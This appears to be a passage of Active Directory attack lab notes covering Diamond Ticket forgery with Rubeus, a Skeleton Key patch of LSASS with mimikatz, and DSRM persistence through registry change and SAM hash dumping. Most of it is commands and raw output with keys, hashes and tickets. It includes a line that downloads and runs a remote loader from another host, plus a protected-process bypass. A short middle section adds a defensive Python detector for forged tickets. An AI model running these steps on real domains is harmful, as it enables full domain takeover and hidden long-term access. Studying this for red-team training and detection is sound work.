Rubeus.exe diamond /krbkey:<aes key of the krbtgt> /tgtdeleg /enctype:aes /ticketuser:<user to
impersonate> /domain:<Domain Name> /dc:<Domain Controller> /ticketuserid:<RID> /groups:<RID>
/createnetonly:<Process to open> /show /ptt

C:\Windows\system32>"C:\AD\Tools\Rubeus.exe" diamond
/krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes
/ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-
dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512
/createnetonly:C:\Windows\System32\cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Diamond Ticket

[*] Showing process : True


[*] Username : 2NOLPPC3
[*] Domain : MUT5S0VA
[*] Password : PM1FDJB6
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4484
[+] LUID : 0x67efd5

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'


[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/dcorp-
dc.dollarcorp.moneycorp.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache:
A5j3/m/jvqqnTSLm5F9zk+LE6N29oivZSo4kNnOUzR4=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

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
UC5MT0NBTA==

[*] Decrypting TGT


[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BNIwggTOoAMCARKhAwIBA6KCBMAEggS8lreMk19l8PWycqiwI3uovya2Zd/xSUi3owugdQb+beFWm6pa
EA0bw4la+R6m41ETE+wgKAs/wDFIv4BepjX+7v9tbiLm5bd1gCno9cP8LTdYFeMYp9ec4ssqdsMDRxk3
P1o+3hsZx2SDX8V3kVZRQQoBIDZlhuU49wcpFePHeJ8w1FxafZzT8eFRziUfc3Yd68h8iRbPQBDSIZ7V
U7ffdPwMI0O6ux7df2HnGotjkJuXqpByulQkFGMR+hftissb+UBR3JDhIo/gFkUOL3kuhVRc6zfPGOFW
c6Jf1CVX9wTqTbVi/EC7qVqdEBHbhn8mh9W8wUX1DFJwOzragBzu5lUd8lHlNt+V2v4lo2ZWZN4qIC4B
u81grgtce0PPXYShnKMkumTW7DskquF5VyUJP2mEbD4v5ST6R8wPU1ZmRxwNyBG04v/HadGFac9tYiWw
jgljQnXPN2eyvywyUzm9ZbGpHx22A4fjy6UvWmZFnIsIyaiMDfsYisUbTh1Zi7zY+oN6pVjjAt2t8fdt
NCMKbqcbftnBp/3ifHtVZh2nIW7kK0SES1gIaJ5A4so/u4WGxNW/hG3shgzONmpGL6q0DTHZBD7uWqvy
zqMo3aQewpPA6+4c4y0lSDyZrwYMf4YzyXVz+7UzmVRESkRhyVSoKPLHrsvuHUGVOsN2puJHKQYdGnHs
/FoRI2PZMcyuc+IWUEUfo4VRHI9evKQ95s23Uy7DznlBaGJGTHE9H7mMUVKh+EA6YFCY5bV5dd02HKQl
jKuVSOKk0XGKGU5Ppd9UJqJg/SVaoGYuRR7XbWyzc0bteL4OvcuOB/VxiHgAc9+iYFiOPpL4hxiD4PoQ
NqF6AtT6EwfTeYnmDIph+2tdf0SPwoWm0ZyjCutD/0YuPXKKx7Nil3D+msbuolZ2SUGzFfRAlN3aaaGr
C2g1NOfuMZBN2euYYiT58j64VYpANYObl2EZNbW0KMg2761ViO4mI12X4eA/DXh0hNv7XkND2JZJej/6
8Ws9VybaxgU3aGj0dbq1VGtMDMUO6fR40NlgYFjFm2AbfgzL04H52tjXE0MFe179TUOf9NisYmNzQScR
ZRkXBoi1+iPR/eEPy+4GKxY24KD4zMPzkd18uqG8hol6WL6vcP5sa3F7Egl6jWPy1eMByDKNYe1WlRT0
chn19fqh6oLALxJMDh2n1O4eFjK272J3QZfTphJMYOj/Ahi6Ti8gv1gh3hDj41NaCk4zrUm3ewT18Sh2
AzkcpisLctDJAiVZdeDF2JYIZh/TlZt1RQl0qBlazPKFO+lSLX1RFGDL0eZB9CaaTgLNuJ83bHaFxBWZ
TVGC8pt4z/JskPDM4C43NOltW9247+vkXxnuQ/3mAhWu9gg3xj18WWNF/Ct/ia1dq19rlxOtsDB2JLcj
TG26x/jTBW7XUyOidFLk1WYks7RRuFXA4pYqhRb1/aTNrZr+ZXH3YD/MARrDE6YOZTGCXgXrk0TeJPHu
sM4nuvDq+YRNCoNLrm3NhaSJdTEPSdmwP+OMlHKO/TZ+rmwY41SM+cd/cqPMl6jQ1RgD5RL8rhNXH1BP
2lXydttqT1W5IHOCbh439igJBNZ/Putv3xHA7ElDY9zaqHsIo4IBGjCCARagAwIBAKKCAQ0EggEJfYIB
BTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgQkNd72y8bxW5pQjcuxxFV5PybPYkZqSCSdTI5Lh/igah
HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcD
BQBgoQAApREYDzIwMjQwNjI4MTYzMzIyWqYRGA8yMDI0MDYyOTAyMzEzNlqnERgPMjAyNDA3MDUxNjMx
MzZaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xM
QVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==
[*] Target LUID: 0x67efd5
[+] Ticket successfully imported!

A new Command Prompt opens.


C:\Windows\system32>klist

Current LogonId is 0:0x67efd5

Cached Tickets: (1)

#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 6/28/2024 9:33:22 (local)
End Time: 6/28/2024 19:31:36 (local)
Renew Time: 7/5/2024 9:31:36 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,390,218,752 bytes free

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe


Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

C:\Users\Administrator>exit
exit
C:\Windows\system32>Powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -


ScriptBlock { $env:username;$env:computername }
administrator
DCORP-DC

Persistence
Once a Diamond Ticket is created and used, the attacker can:

• Maintain long-term access: the ticket itself carries the DC-issued lifetime (10 hours, renewable for 7
days in the transcript above), but new Diamond Tickets can be minted for as long as the krbtgt key is
unchanged, and that password is changed very rarely.

• Bypass password changes: even if the impersonated user's password is changed, the Diamond Ticket
remains valid until the krbtgt password is changed.

• Impersonate any user: with the krbtgt key the PAC can be rewritten to any user and group set, giving
flexibility in the attack.

To invalidate existing Golden and Diamond Tickets, reset the krbtgt password twice, letting replication
complete between the two resets: the KDC keeps the previous krbtgt key in the account's password
history and keeps accepting tickets encrypted with it until the second reset.

Skeleton Key attack


The Skeleton Key is a particularly scary piece of malware (re-implemented in mimikatz as misc::skeleton)
targeted at Active Directory domains that makes it alarmingly easy to hijack any account. It patches
LSASS in memory on a domain controller so that a master password (by default "mimikatz") is accepted
for every account in the domain. After that, we can authenticate as any user by supplying that one
password; authenticating as a member of the Domain Admins group gives administrative access to the
domain controller. Existing passwords continue to work alongside the master password, so users notice
nothing, and it is very difficult to know the attack has taken place unless you know what to look for.

Requirements
In order to perpetrate this attack, the attacker must have Domain Admin rights. This attack must be
performed on each and every domain controller for complete compromise, but even targeting a single
domain controller can be effective. Rebooting a domain controller will remove this malware and it will
have to be redeployed by the attacker.

Execution
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : OHVJOGEJ
[*] Domain : 82D4OOQN
[*] Password : 5A65HR2D
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 672
[+] LUID : 0x714ed4

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 7425748
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x714ed4
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/28/2024 10:14:02 AM
EndTime : 6/28/2024 8:14:02 PM
RenewTill : 7/5/2024 10:14:02 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fdNgKP780h2wx1f4b2QWCgcRzFpC/mj/3cdtLwLDb/4=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011
A new command prompt opens with Domain Administrator (svcadmin) privileges. We now use Invoke-MimiEx.ps1,
a PowerShell loader for mimikatz, to execute the attack on the DC over PowerShell Remoting.
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local


[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> iex (iwr -UseBasicParsing
http://172.16.100.163/Invoke-MimiEx.ps1)
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"privilege::debug" "misc::skeleton"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> exit

Now, from a normal command prompt, we create a credential object with the username svcadmin and the
skeleton password "mimikatz" (svcadmin's real password is not needed).
PS C:\Windows\system32> $Credential = Get-Credential

cmdlet Get-Credential at command pipeline position 1


Supply values for the following parameters:
Credential
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { $env:username;$env:computername } -Credential $Credential
svcadmin
DCORP-DC

Avoid this technique in real engagements: it patches LSASS on a production domain controller and leaves
every account in the domain accepting a second password until the DC is rebooted.


If LSASS is running as a protected process (RunAsPPL), the attack can still be used, but it requires the
mimikatz driver (mimidrv.sys) to be dropped on the disk of the target DC and loaded, which is noisier:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

Persistence
Rebooting a domain controller will remove this malware and it will have to be redeployed by the attacker.
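The Diamond Ticket section above lists what makes it quieter than a Golden Ticket, and the Skeleton Key is "very difficult to know ... unless you know what to look for"; both come down to the DC's Kerberos audit events. What follows is an added example (not the lab's own code, and not from Rubeus or mimikatz) that runs two checks over constructed 4768/4769 records. The first flags service ticket requests (4769) for an account that has no TGT request (4768) from the same client within a TGT lifetime, the gap the Diamond Ticket section describes for Golden Tickets; a Diamond Ticket built with /tgtdeleg narrows that gap but does not close it, because the TGT Rubeus rewrote was issued to the current user (student163, visible in the first kirbi of that transcript) while the later 4769s name administrator. The second flags RC4 (etype 0x17) ticket activity for accounts that hold AES keys, which is how logons with the skeleton password stand out: mimikatz patches the RC4 path (the "[RC4] ... patch OK" lines above) and the skeleton password only works through it. A Silver Ticket never reaches the KDC, so neither check sees it; its only trace is the logon on the target host.

```python
"""Spotting forged or rewritten Kerberos tickets in DC audit events.

Added example, not part of the lab notes. It runs two checks over a
constructed list of records shaped like Windows Security log events
(4768 = Kerberos TGT requested, 4769 = service ticket requested). The
field names are this example's own and nothing here reads a real log.
"""
from datetime import datetime, timedelta

ETYPE_AES256 = 0x12
ETYPE_RC4 = 0x17
# Default TGT lifetime is 10 hours (the EndTime seen in the tickets above);
# renewals (event 4770) extend it and are not modelled here.
TGT_LIFETIME = timedelta(hours=10)

# Constructed sample, in time order:
#  1. student163 logs on normally (4768, then a 4769 for CIFS on the DC).
#  2. service tickets are requested as administrator from the same client,
#     but no TGT was ever issued to administrator: the pattern a golden
#     ticket leaves, and also a diamond ticket built from student163's TGT.
#  3. svcadmin obtains tickets with RC4 although the account holds AES keys.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-06-28 09:00:01", "account": "student163",
     "service": "krbtgt", "client": "172.16.100.163", "etype": ETYPE_AES256},
    {"id": 4769, "time": "2024-06-28 09:00:02", "account": "student163",
     "service": "cifs/dcorp-dc", "client": "172.16.100.163", "etype": ETYPE_AES256},
    {"id": 4769, "time": "2024-06-28 09:33:40", "account": "administrator",
     "service": "cifs/dcorp-dc", "client": "172.16.100.163", "etype": ETYPE_AES256},
    {"id": 4769, "time": "2024-06-28 09:34:05", "account": "administrator",
     "service": "http/dcorp-dc", "client": "172.16.100.163", "etype": ETYPE_AES256},
    {"id": 4768, "time": "2024-06-28 10:14:00", "account": "svcadmin",
     "service": "krbtgt", "client": "172.16.100.163", "etype": ETYPE_RC4},
    {"id": 4769, "time": "2024-06-28 10:14:01", "account": "svcadmin",
     "service": "cifs/dcorp-dc", "client": "172.16.100.163", "etype": ETYPE_RC4},
]


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def tgs_without_tgt(events, window=TGT_LIFETIME):
    """Return 4769 events for which the same account, from the same client,
    had no 4768 within `window` before it. A forged TGT (golden) never
    produced a 4768; a TGT rewritten from another account's TGT (diamond
    with /tgtdeleg) produced one for that account, not the impersonated one,
    so both show up here."""
    tgts = [e for e in events if e["id"] == 4768]
    flagged = []
    for e in events:
        if e["id"] != 4769:
            continue
        t = _ts(e["time"])
        covered = any(
            x["account"].lower() == e["account"].lower()
            and x["client"] == e["client"]
            and t - window <= _ts(x["time"]) <= t
            for x in tgts
        )
        if not covered:
            flagged.append(e)
    return flagged


def rc4_downgrades(events, aes_accounts):
    """Return 4768/4769 events that used RC4 (etype 0x17) for accounts known
    to hold AES keys. Normal clients negotiate AES for such accounts; the
    skeleton password only works through the patched RC4 path, so logons
    with it appear as RC4 tickets."""
    wanted = {a.lower() for a in aes_accounts}
    return [e for e in events
            if e["id"] in (4768, 4769) and e["etype"] == ETYPE_RC4
            and e["account"].lower() in wanted]


if __name__ == "__main__":
    for e in tgs_without_tgt(SAMPLE_EVENTS):
        print("4769 without TGT request:", e["account"], "->", e["service"], e["time"])
    for e in rc4_downgrades(SAMPLE_EVENTS, {"svcadmin"}):
        print("RC4 for AES account:", e["id"], e["account"], e["time"])
```

The events, times and addresses are constructed. Against a real DC this would read the Security log (for example with Get-WinEvent) and key on TargetUserName, IpAddress and TicketEncryptionType; the window should match the domain's TGT lifetime and take 4770 renewals into account, and the AES account list can be built from msDS-SupportedEncryptionTypes.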

DSRM attack
DSRM is Directory Services Restore Mode.

The DSRM administrator account is the only local user account on a domain controller (DC). It lives in
the DC's local SAM rather than in Active Directory and is not usable when the DC is booted into normal
mode. As its name implies, the account is meant to be used only when the DC is booted into Directory
Services Restore Mode.

The DSRM (safe mode) password is set when a server is promoted to domain controller and is rarely used
or changed afterwards.

After altering a registry setting on the DC, it is possible to pass the NTLM hash of this account to
access the DC.

Dumping the DSRM administrator's hash from the DC's local SAM requires Domain Admin privileges.

The persistence is very long, since the DSRM password is reset very rarely.
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"token::elevate" "lsadump::sam"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

620 {0;000003e7} 1 D 18484 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p)


Primary
-> Impersonated !
* Process Token : {0;01677997} 0 D 23559029 dcorp\svcadmin S-1-5-21-719815819-3726368948-
3917688648-1118 (12g,26p) Primary
* Thread Token : {0;000003e7} 1 D 31155148 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p)
Impersonation (Delegation)

mimikatz(powershell) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870

SAMKey : f3a9473cb084668dcf1d7e5f47562659

RID : 000001f4 (500)


User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd

RID : 000001f5 (501)


User : Guest

RID : 000001f7 (503)


User : DefaultAccount

RID : 000001f8 (504)


User : WDAGUtilityAccount

We can pass this hash to authenticate as the DSRM administrator. However, the logon behaviour of the
account must first be changed, because by default it can only log on while the DC is booted into DSRM.

The following registry value must be set to enable this:

• Key name: HKLM\System\CurrentControlSet\Control\Lsa

• Entry name: DsrmAdminLogonBehavior

• Type: REG_DWORD

• Value: 0, 1 or 2

0 – The DSRM Administrator can log on only in DSRM. This is the default behaviour (and what applies
when the value is absent).

1 – The DSRM Administrator can log on when the AD DS (NTDS) service is stopped.

2 – The DSRM Administrator can log on to the domain controller at any time.


The value name must be exactly DsrmAdminLogonBehavior; a misspelt name creates an unrelated value and
leaves the default behaviour in place.
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Set-ItemProperty -Path
"HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Get-ItemProperty -Path
"HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior"

DsrmAdminLogonBehavior : 2
PSPath :
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA
PSParentPath :
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : LSA
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Now we pass the hash of the DSRM administrator with sekurlsa::pth. Note that /domain is the DC's host
name (dcorp-dc), not the domain: the DSRM administrator is a local SAM account on the DC, so the logon
is validated by the DC against its local SAM over NTLM rather than by the KDC.
